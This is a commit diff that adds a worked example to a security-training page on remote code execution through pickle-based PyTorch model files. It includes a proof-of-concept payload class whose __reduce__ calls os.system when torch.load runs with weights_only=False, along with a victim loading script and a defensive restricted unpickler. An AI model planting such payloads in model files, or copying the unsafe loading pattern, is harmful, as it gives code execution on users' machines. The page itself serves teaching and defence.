
Commit 8ac9da8 ("example pytorch")
1 parent b278df4

1 file changed: src/AI/AI-Models-RCE.md (43 additions, 0 deletions)
@@ -26,5 +26,48 @@ At the time of writing, these are some examples of this type of vulnerability
Moreover, there are some Python pickle-based models, such as the ones used by [PyTorch](https://github.com/pytorch/pytorch/security), that can be used to execute arbitrary code on the system if they are not loaded with `weights_only=True`. Therefore, any pickle-based model may be especially susceptible to this type of attack, even if it is not listed in the table above.
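The root cause can be reproduced with the standard library alone: any object whose `__reduce__` returns a callable plus its arguments makes `pickle.loads` invoke that callable during deserialization. Below is a minimal, hypothetical sketch that substitutes a harmless `eval` of `6 * 7` for the `os.system` call an attacker would use:

```python
import pickle

class Payload:
    # __reduce__ tells pickle how to reconstruct the object:
    # "call this callable with these arguments". Any picklable
    # callable works; an attacker would use os.system instead of eval.
    def __reduce__(self):
        return (eval, ("6 * 7",))

blob = pickle.dumps(Payload())

# The call happens during deserialization itself; no attribute of the
# resulting object needs to be touched.
result = pickle.loads(blob)
print(result)  # 42
```

This is why "just reading" an untrusted pickle file is already code execution.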

Example:

- Create the model:

```python
# attacker_payload.py
import torch
import os

class MaliciousPayload:
    def __reduce__(self):
        # This code will be executed when the file is unpickled (i.e., during torch.load)
        return (os.system, ("echo 'You have been hacked!' > /tmp/pwned.txt",))

# Create a fake model state dict with malicious content
malicious_state = {"fc.weight": MaliciousPayload()}

# Save the malicious state dict
torch.save(malicious_state, "malicious_state.pth")
```

- Load the model:

```python
# victim_load.py
import torch
import torch.nn as nn

class MyModel(nn.Module):
    def __init__(self):
        super().__init__()
        self.fc = nn.Linear(10, 1)

model = MyModel()

# ⚠️ This triggers code execution from the pickle inside the .pth file
model.load_state_dict(torch.load("malicious_state.pth", weights_only=False))

# /tmp/pwned.txt is created even if load_state_dict raises an error
```
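As a defensive counterpart, the pickle documentation recommends overriding `Unpickler.find_class` to allow-list which globals a pickle may reference; `torch.load(..., weights_only=True)` applies the same idea by only permitting tensor-related types. A minimal, stdlib-only sketch (the `Payload` and `RestrictedUnpickler` names are illustrative):

```python
import io
import pickle

class Payload:
    # stand-in for a malicious object; a real attacker would use os.system
    def __reduce__(self):
        return (eval, ("1 + 1",))

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Deny every global lookup. A real implementation would permit
        # a small allow-list of known-safe types instead.
        raise pickle.UnpicklingError(f"blocked: {module}.{name}")

blob = pickle.dumps(Payload())
try:
    RestrictedUnpickler(io.BytesIO(blob)).load()
    blocked = False
except pickle.UnpicklingError as err:
    blocked = True
    print(err)  # → blocked: builtins.eval

print(blocked)  # True
```

The lookup of `eval` is intercepted before it can be called, so the payload never runs. This mirrors why `weights_only=True` refuses to load state dicts containing arbitrary objects.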
{{#include ../banners/hacktricks-training.md}}
